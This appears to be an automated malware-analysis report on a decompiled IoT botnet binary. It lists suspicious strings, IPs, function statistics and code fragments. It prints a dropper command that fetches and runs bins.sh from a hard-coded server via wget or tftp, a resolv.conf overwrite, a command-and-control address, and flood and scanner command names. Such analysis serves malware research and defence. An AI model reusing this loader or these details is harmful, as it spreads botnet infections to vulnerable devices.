=============================================================================
========	BINARY ID :1034207b116984d3dac9b2d0003fc0875219a37b==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :639
SUPSCPECTED LINES COUNT :42
SUPSCPECTED STRINGS COUNT (DISTINCT) :17
SUPSCPECTED STRINGS WEIGHT :62
SUSPECT STRING SCORE : [62 / 150] 41%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :2
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n
/bin/sh
/proc/cpuinfo
PING
Invalid flag "%s"
GETLOCALIP
KILLATTK
/proc/net/route
%sWelcome to the botnet [%s:%s:%d cores] :)%s
%sCould not connect to commServer!%s\n
SCANNER
SCANNER ON | OFF
SCANNER STOPPED!
attempting to start scanner
SCANNER STARTED!
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
;<=>?@ABCDEFGJIMOPQRSTUVWX[\\^_`abcxyz{|}~
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.158.113.30:7
8.8.8.8
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
%d.%d.%d.%d
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
/proc/cpuinfo
/proc/net/route
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 90894
+++TOTAL FUNCTIONS 			:203
+++LINES PER FUNCTION RATIO 	: 447.753694581281
+++SUSPECTED LINES COUNT 	: 200
+++SUSPECTED LINES RATIO 	: 0.220036526063327
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 90894
+++WHILE (TRUE) LINES			: 13139
+++WHILE (TRUE) LINES RATION		:14.4552995797302%
+++WHILE (TRUE) LOOPS COUNT		: 73
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v92)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
    char (*v93)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";
            function_40fa70((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
        function_40fa70((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
        function_40fa70((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    function_40fa70((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    int32_t v344 = function_40b960("/proc/cpuinfo", 0); // 0x402434
    int32_t v344 = function_40b960("/proc/cpuinfo", 0); // 0x402738
    int32_t v348 = function_40b960("/proc/net/route", 0); // 0x409fa0
    int32_t v344 = function_40b960("/dev/null", a2); // 0x410054
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
    char (*v88)[17] = "185.158.113.30:7";

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

    char (*v92)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";

    char (*v93)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";

        function_401518(v356, (int32_t)"%d.%d.%d.%d", v345, v349, v352, v354 % 256);

    function_40e360((int32_t)"8.8.8.8");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_40c3c4                                   |3   |8885    |33            |8469        |
----------------------------------------------------------------------------------------------
function_40a198                                   |2   |781     |12            |330         |
----------------------------------------------------------------------------------------------
function_411200                                   |5   |1367    |11            |929         |
----------------------------------------------------------------------------------------------
function_408888                                   |2   |765     |10            |94          |
----------------------------------------------------------------------------------------------
function_40cf4c                                   |1   |1174    |6             |813         |
----------------------------------------------------------------------------------------------
function_402944                                   |3   |443     |5             |71          |
----------------------------------------------------------------------------------------------
function_4023f8                                   |1   |435     |4             |48          |
----------------------------------------------------------------------------------------------
function_410fc0                                   |3   |392     |4             |0           |
----------------------------------------------------------------------------------------------
function_4000cc                                   |0   |384     |4             |0           |
----------------------------------------------------------------------------------------------
function_4080c4                                   |3   |496     |4             |127         |
----------------------------------------------------------------------------------------------
function_407990                                   |3   |503     |4             |133         |
----------------------------------------------------------------------------------------------
function_409e18                                   |0   |401     |4             |21          |
----------------------------------------------------------------------------------------------
function_4045ec                                   |1   |702     |3             |326         |
----------------------------------------------------------------------------------------------
function_401bd4                                   |1   |436     |3             |46          |
----------------------------------------------------------------------------------------------
function_411a54                                   |1   |441     |3             |79          |
----------------------------------------------------------------------------------------------
function_40dd10                                   |2   |442     |3             |92          |
----------------------------------------------------------------------------------------------
function_40de10                                   |2   |472     |3             |108         |
----------------------------------------------------------------------------------------------
function_40703c                                   |7   |469     |3             |41          |
----------------------------------------------------------------------------------------------
function_411bb0                                   |3   |438     |3             |89          |
----------------------------------------------------------------------------------------------
function_40e550                                   |4   |356     |2             |0           |
----------------------------------------------------------------------------------------------
function_4110a0                                   |3   |450     |2             |44          |
----------------------------------------------------------------------------------------------
function_40e5b0                                   |5   |356     |2             |0           |
----------------------------------------------------------------------------------------------
function_4124d4                                   |1   |413     |2             |27          |
----------------------------------------------------------------------------------------------
function_40df60                                   |0   |423     |2             |77          |
----------------------------------------------------------------------------------------------
function_40bfb8                                   |0   |390     |2             |35          |
----------------------------------------------------------------------------------------------
function_4034d0                                   |1   |404     |2             |55          |
----------------------------------------------------------------------------------------------
function_40dc50                                   |3   |434     |2             |28          |
----------------------------------------------------------------------------------------------
function_40f710                                   |2   |1132    |2             |0           |
----------------------------------------------------------------------------------------------
function_40e6b0                                   |3   |357     |2             |0           |
----------------------------------------------------------------------------------------------
function_40db90                                   |0   |410     |2             |25          |
----------------------------------------------------------------------------------------------
function_4036e8                                   |4   |443     |2             |92          |
----------------------------------------------------------------------------------------------
function_402ce4                                   |4   |396     |2             |19          |
----------------------------------------------------------------------------------------------
function_40da34                                   |1   |439     |2             |33          |
----------------------------------------------------------------------------------------------
function_400f68                                   |3   |544     |2             |183         |
----------------------------------------------------------------------------------------------
function_411dd0                                   |2   |435     |2             |74          |
----------------------------------------------------------------------------------------------
function_40cb70                                   |1   |418     |2             |40          |
----------------------------------------------------------------------------------------------
function_411050                                   |4   |368     |2             |0           |
----------------------------------------------------------------------------------------------
function_411d94                                   |2   |395     |2             |42          |
----------------------------------------------------------------------------------------------
function_40e4f0                                   |5   |356     |2             |0           |
----------------------------------------------------------------------------------------------
function_400cd0                                   |7   |436     |2             |28          |
----------------------------------------------------------------------------------------------
function_400a94                                   |4   |452     |1             |13          |
----------------------------------------------------------------------------------------------
function_4125a4                                   |1   |394     |1             |44          |
----------------------------------------------------------------------------------------------
function_40b830                                   |3   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40ecd0                                   |2   |397     |1             |38          |
----------------------------------------------------------------------------------------------
function_40c260                                   |3   |369     |1             |16          |
----------------------------------------------------------------------------------------------
function_401e50                                   |3   |373     |1             |22          |
----------------------------------------------------------------------------------------------
function_40f42c                                   |2   |398     |1             |33          |
----------------------------------------------------------------------------------------------
function_40e470                                   |5   |356     |1             |0           |
----------------------------------------------------------------------------------------------
function_40e280                                   |1   |367     |1             |18          |
----------------------------------------------------------------------------------------------
function_4106e0                                   |0   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40e630                                   |5   |356     |1             |0           |
----------------------------------------------------------------------------------------------
function_40ccc0                                   |0   |473     |1             |71          |
----------------------------------------------------------------------------------------------
function_410a90                                   |0   |449     |1             |31          |
----------------------------------------------------------------------------------------------
function_410b80                                   |2   |421     |1             |26          |
----------------------------------------------------------------------------------------------
function_403020                                   |0   |375     |1             |10          |
----------------------------------------------------------------------------------------------
function_403a4c                                   |1   |447     |1             |18          |
----------------------------------------------------------------------------------------------
function_40b960                                   |2   |362     |1             |0           |
----------------------------------------------------------------------------------------------
function_40e410                                   |4   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_410118                                   |7   |684     |1             |18          |
----------------------------------------------------------------------------------------------
function_410620                                   |3   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_400810                                   |1   |376     |1             |22          |
----------------------------------------------------------------------------------------------
function_40b7d0                                   |0   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40d860                                   |0   |605     |1             |91          |
----------------------------------------------------------------------------------------------
function_40e3b0                                   |4   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_410740                                   |0   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40bb40                                   |4   |371     |1             |0           |
----------------------------------------------------------------------------------------------
function_40b660                                   |1   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_401f74                                   |1   |367     |1             |17          |
----------------------------------------------------------------------------------------------
function_410830                                   |0   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40b720                                   |0   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40db30                                   |2   |368     |1             |18          |
----------------------------------------------------------------------------------------------
function_40b900                                   |2   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_40cee0                                   |1   |367     |1             |15          |
----------------------------------------------------------------------------------------------
function_4026fc                                   |0   |361     |1             |0           |
----------------------------------------------------------------------------------------------
function_4107a0                                   |0   |357     |1             |0           |
----------------------------------------------------------------------------------------------
function_410980                                   |5   |356     |1             |0           |
----------------------------------------------------------------------------------------------
function_40ef70                                   |0   |350     |0             |0           |
----------------------------------------------------------------------------------------------
function_4120a0                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_409bc8                                   |0   |382     |0             |0           |
----------------------------------------------------------------------------------------------
function_4120d0                                   |1   |353     |0             |0           |
----------------------------------------------------------------------------------------------
function_40edd8                                   |3   |461     |0             |0           |
----------------------------------------------------------------------------------------------
function_4042e0                                   |2   |352     |0             |0           |
----------------------------------------------------------------------------------------------
function_400368                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |349     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b540                                   |2   |356     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bbe0                                   |1   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_402354                                   |1   |358     |0             |0           |
----------------------------------------------------------------------------------------------
function_4003b8                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40cc50                                   |1   |354     |0             |0           |
----------------------------------------------------------------------------------------------
function_4125a0                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e268                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f980                                   |1   |366     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b4b0                                   |2   |363     |0             |0           |
----------------------------------------------------------------------------------------------
function_411d90                                   |0   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bae0                                   |1   |356     |0             |0           |
----------------------------------------------------------------------------------------------
function_40021c                                   |0   |361     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd10                                   |1   |356     |0             |0           |
----------------------------------------------------------------------------------------------
function_401518                                   |6   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd50                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_411ef0                                   |0   |524     |0             |0           |
----------------------------------------------------------------------------------------------
function_410e80                                   |2   |441     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ef50                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40c150                                   |3   |383     |0             |0           |
----------------------------------------------------------------------------------------------
function_40c0e0                                   |1   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b9dc                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bee0                                   |0   |351     |0             |0           |
----------------------------------------------------------------------------------------------
function_410890                                   |3   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fb40                                   |1   |431     |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |0   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_40ff30                                   |0   |375     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e33c                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e7c0                                   |2   |429     |0             |0           |
----------------------------------------------------------------------------------------------
function_4109e0                                   |3   |358     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e200                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f5a0                                   |4   |383     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e240                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b5b0                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_402838                                   |2   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_400160                                   |0   |386     |0             |0           |
----------------------------------------------------------------------------------------------
function_404068                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e150                                   |1   |358     |0             |0           |
----------------------------------------------------------------------------------------------
function_4022b4                                   |2   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d6c0                                   |2   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40eb40                                   |1   |416     |0             |0           |
----------------------------------------------------------------------------------------------
function_40456c                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd70                                   |1   |372     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e228                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_4126f0                                   |0   |362     |0             |0           |
----------------------------------------------------------------------------------------------
function_401608                                   |2   |352     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ba60                                   |5   |356     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e950                                   |1   |430     |0             |0           |
----------------------------------------------------------------------------------------------
function_410004                                   |2   |360     |0             |0           |
----------------------------------------------------------------------------------------------
function_411a50                                   |3   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bc40                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_4067b0                                   |6   |539     |0             |0           |
----------------------------------------------------------------------------------------------
function_41008c                                   |0   |367     |0             |0           |
----------------------------------------------------------------------------------------------
function_410800                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_410480                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b600                                   |1   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_400638                                   |0   |369     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f37c                                   |0   |372     |0             |0           |
----------------------------------------------------------------------------------------------
function_411cc0                                   |1   |368     |0             |0           |
----------------------------------------------------------------------------------------------
function_404444                                   |4   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_40db2c                                   |0   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_4105c0                                   |3   |359     |0             |0           |
----------------------------------------------------------------------------------------------
function_4124d0                                   |2   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40050c                                   |1   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b470                                   |1   |356     |0             |0           |
----------------------------------------------------------------------------------------------
function_412190                                   |2   |474     |0             |0           |
----------------------------------------------------------------------------------------------
function_410a50                                   |2   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b890                                   |3   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fffc                                   |2   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_412320                                   |2   |828     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f014                                   |1   |352     |0             |0           |
----------------------------------------------------------------------------------------------
function_404114                                   |2   |391     |0             |0           |
----------------------------------------------------------------------------------------------
function_410680                                   |4   |361     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f0c4                                   |3   |352     |0             |0           |
----------------------------------------------------------------------------------------------
function_400330                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_411b60                                   |4   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40da30                                   |2   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d9a0                                   |3   |477     |0             |0           |
----------------------------------------------------------------------------------------------
function_4009dc                                   |2   |351     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e110                                   |1   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e360                                   |1   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b6c0                                   |2   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e914                                   |2   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_402024                                   |2   |504     |0             |0           |
----------------------------------------------------------------------------------------------
function_4104d0                                   |3   |363     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f194                                   |1   |351     |0             |0           |
----------------------------------------------------------------------------------------------
function_412760                                   |0   |349     |0             |0           |
----------------------------------------------------------------------------------------------
function_401590                                   |3   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f6f0                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ba00                                   |3   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d540                                   |2   |560     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fff4                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40c2e0                                   |4   |400     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b780                                   |0   |352     |0             |0           |
----------------------------------------------------------------------------------------------
function_4108f0                                   |1   |397     |0             |0           |
----------------------------------------------------------------------------------------------
function_40db60                                   |2   |359     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bc60                                   |3   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_40edbc                                   |3   |353     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bf98                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e710                                   |2   |359     |0             |0           |
----------------------------------------------------------------------------------------------
function_40df10                                   |3   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bc80                                   |2   |359     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e8e8                                   |0   |351     |0             |0           |
----------------------------------------------------------------------------------------------
function_403298                                   |3   |386     |0             |0           |
----------------------------------------------------------------------------------------------
function_412640                                   |3   |350     |0             |0           |
----------------------------------------------------------------------------------------------
function_401760                                   |2   |567     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fd80                                   |3   |361     |0             |0           |
----------------------------------------------------------------------------------------------
function_412460                                   |3   |354     |0             |0           |
----------------------------------------------------------------------------------------------
function_40be80                                   |3   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_4125f0                                   |1   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ed90                                   |4   |358     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bce0                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_410ca0                                   |3   |437     |0             |0           |
----------------------------------------------------------------------------------------------
function_412140                                   |2   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e780                                   |1   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d740                                   |4   |419     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e0f0                                   |2   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f240                                   |2   |378     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e8c0                                   |2   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fa70                                   |5   |375     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_40c3c4 ===================
++++++++ FUNCTION START 33348
++++++++ FUNCTION END 42233
++++++++ FUNCTION LENGTH 8885
        while (true) {
                case 37: {
                        while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                                while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                while (true) {
                                                            while (true) {
                                                                while (true) {
                                                            while (true) {
                                                                    while (true) {
                case 0: {
                            while (true) {
    while (true) {
            case 37: {
                        while (true) {
            case 0: {
                        while (true) {
=================FUNCTION : function_40a198 ===================
++++++++ FUNCTION START 19908
++++++++ FUNCTION END 20689
++++++++ FUNCTION LENGTH 781
    function_40be80((int32_t)"%sWelcome to the botnet [%s:%s:%d cores] :)%s", (int32_t)&v344, v343);
            function_40be80((int32_t)"%sCould not connect to commServer!%s\n", (int32_t)&v344, (int32_t)&v346);
        while (true) {
            while (true) {
                    while (true) {
                        while (true) {
                                while (true) {
                        while (true) {
                                    while (true) {
        function_40be80((int32_t)"%sCould not connect to commServer!%s\n", (int32_t)&v344, (int32_t)&v346);
    while (true) {
    while (true) {
=================FUNCTION : function_411200 ===================
++++++++ FUNCTION START 80159
++++++++ FUNCTION END 81526
++++++++ FUNCTION LENGTH 1367
    while (true) {
    while (true) {
        while (true) {
                    while (true) {
                        while (true) {
                                            while (true) {
                                                while (true) {
                                        while (true) {
                                while (true) {
                                        while (true) {
                            while (true) {
=================FUNCTION : function_408888 ===================
++++++++ FUNCTION START 18351
++++++++ FUNCTION END 19116
++++++++ FUNCTION LENGTH 765
    if (function_40db30(*a2, (int32_t)"PING") == 0) {
    if (function_40db30(*a2, (int32_t)"GETLOCALIP") == 0) {
                while (true) {
                    while (true) {
    if (function_40db30(*a2, (int32_t)"UDP") == 0) {
                                        while (true) {
    if (function_40db30(*a2, (int32_t)"TCP") == 0) {
                                while (true) {
        if (function_40db30(*a2, (int32_t)"KILLATTK") == 0) {
            while (true) {
=================FUNCTION : function_40cf4c ===================
++++++++ FUNCTION START 43860
++++++++ FUNCTION END 45034
++++++++ FUNCTION LENGTH 1174
    while (true) {
            while (true) {
                while (true) {
                                while (true) {
                                        while (true) {
                                        while (true) {
=================FUNCTION : function_402944 ===================
++++++++ FUNCTION START 10912
++++++++ FUNCTION END 11355
++++++++ FUNCTION LENGTH 443
        while (true) {
            function_401608(v353, (int32_t)"PING");
            while (true) {
            while (true) {
    while (true) {
=================FUNCTION : function_4023f8 ===================
++++++++ FUNCTION START 9750
++++++++ FUNCTION END 10185
++++++++ FUNCTION LENGTH 435
    int32_t v344 = function_40b960("/proc/cpuinfo", 0); // 0x402434
    while (true) {
            while (true) {
    while (true) {
=================FUNCTION : function_410fc0 ===================
++++++++ FUNCTION START 78940
++++++++ FUNCTION END 79332
++++++++ FUNCTION LENGTH 392
                case 256: {
                case 512: {
                case 256: {
                case 512: {
=================FUNCTION : function_4000cc ===================
++++++++ FUNCTION START 286
++++++++ FUNCTION END 670
++++++++ FUNCTION LENGTH 384
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v92)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
=================FUNCTION : function_4080c4 ===================
++++++++ FUNCTION START 17852
++++++++ FUNCTION END 18348
++++++++ FUNCTION LENGTH 496
    while (true) {
        while (true) {
                    while (true) {
                    if (function_40e3b0(*v373, (struct sockaddr *)&v347, 16) == -1) {
=================FUNCTION : function_407990 ===================
++++++++ FUNCTION START 17346
++++++++ FUNCTION END 17849
++++++++ FUNCTION LENGTH 503
    while (true) {
        while (true) {
                while (true) {
                    if (function_40e3b0(*v373, (struct sockaddr *)&v347, 16) == -1) {
=================FUNCTION : function_409e18 ===================
++++++++ FUNCTION START 19504
++++++++ FUNCTION END 19905
++++++++ FUNCTION LENGTH 401
    function_40e3b0(v344, (struct sockaddr *)&v345, 16);
    function_40e410(v344, (struct sockaddr *)&v347, (int32_t)&v346);
    int32_t v348 = function_40b960("/proc/net/route", 0); // 0x409fa0
    while (true) {
=================FUNCTION : function_4045ec ===================
++++++++ FUNCTION START 15627
++++++++ FUNCTION END 16329
++++++++ FUNCTION LENGTH 702
    while (true) {
                if (function_40e3b0(*v363, (struct sockaddr *)&v345, 16) == -1) {
                while (true) {
=================FUNCTION : function_401bd4 ===================
++++++++ FUNCTION START 7347
++++++++ FUNCTION END 7783
++++++++ FUNCTION LENGTH 436
            while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_411a54 ===================
++++++++ FUNCTION START 81879
++++++++ FUNCTION END 82320
++++++++ FUNCTION LENGTH 441
    while (true) {
    while (true) {
    while (true) {
=================FUNCTION : function_40dd10 ===================
++++++++ FUNCTION START 50185
++++++++ FUNCTION END 50627
++++++++ FUNCTION LENGTH 442
    while (true) {
        while (true) {
        while (true) {
=================FUNCTION : function_40de10 ===================
++++++++ FUNCTION START 50630
++++++++ FUNCTION END 51102
++++++++ FUNCTION LENGTH 472
    while (true) {
    while (true) {
        while (true) {
=================FUNCTION : function_40703c ===================
++++++++ FUNCTION START 16874
++++++++ FUNCTION END 17343
++++++++ FUNCTION LENGTH 469
    while (true) {
        if (function_40db30(v357, (int32_t)"rst") == 0) {
        if (function_40db30(v357, (int32_t)"psh") == 0) {
=================FUNCTION : function_411bb0 ===================
++++++++ FUNCTION START 82673
++++++++ FUNCTION END 83111
++++++++ FUNCTION LENGTH 438
    while (true) {
        while (true) {
        while (true) {
=================FUNCTION : function_40e550 ===================
++++++++ FUNCTION START 56855
++++++++ FUNCTION END 57211
++++++++ FUNCTION LENGTH 356
    int32_t v344 = send(sock, buf, length, flags); // 0x40e570
    if (flags != 0) {
=================FUNCTION : function_4110a0 ===================
++++++++ FUNCTION START 79706
++++++++ FUNCTION END 80156
++++++++ FUNCTION LENGTH 450
        while (true) {
    while (true) {
=================FUNCTION : function_40e5b0 ===================
++++++++ FUNCTION START 57214
++++++++ FUNCTION END 57570
++++++++ FUNCTION LENGTH 356
    int32_t v344 = sendto(sock, message, length, flags, NULL, 0); // 0x40e5f0
    if (flags != 0) {
=================FUNCTION : function_4124d4 ===================
++++++++ FUNCTION START 88267
++++++++ FUNCTION END 88680
++++++++ FUNCTION LENGTH 413
    while (true) {
    while (true) {
=================FUNCTION : function_40df60 ===================
++++++++ FUNCTION START 51455
++++++++ FUNCTION END 51878
++++++++ FUNCTION LENGTH 423
    while (true) {
        while (true) {
=================FUNCTION : function_40bfb8 ===================
++++++++ FUNCTION START 31434
++++++++ FUNCTION END 31824
++++++++ FUNCTION LENGTH 390
    while (true) {
    while (true) {
=================FUNCTION : function_4034d0 ===================
++++++++ FUNCTION START 12524
++++++++ FUNCTION END 12928
++++++++ FUNCTION LENGTH 404
    while (true) {
        while (true) {
=================FUNCTION : function_40dc50 ===================
++++++++ FUNCTION START 49748
++++++++ FUNCTION END 50182
++++++++ FUNCTION LENGTH 434
                            while (true) {
    while (true) {
=================FUNCTION : function_40f710 ===================
++++++++ FUNCTION START 66582
++++++++ FUNCTION END 67714
++++++++ FUNCTION LENGTH 1132
        case 43: {
        case 45: {
=================FUNCTION : function_40e6b0 ===================
++++++++ FUNCTION START 57932
++++++++ FUNCTION END 58289
++++++++ FUNCTION LENGTH 357
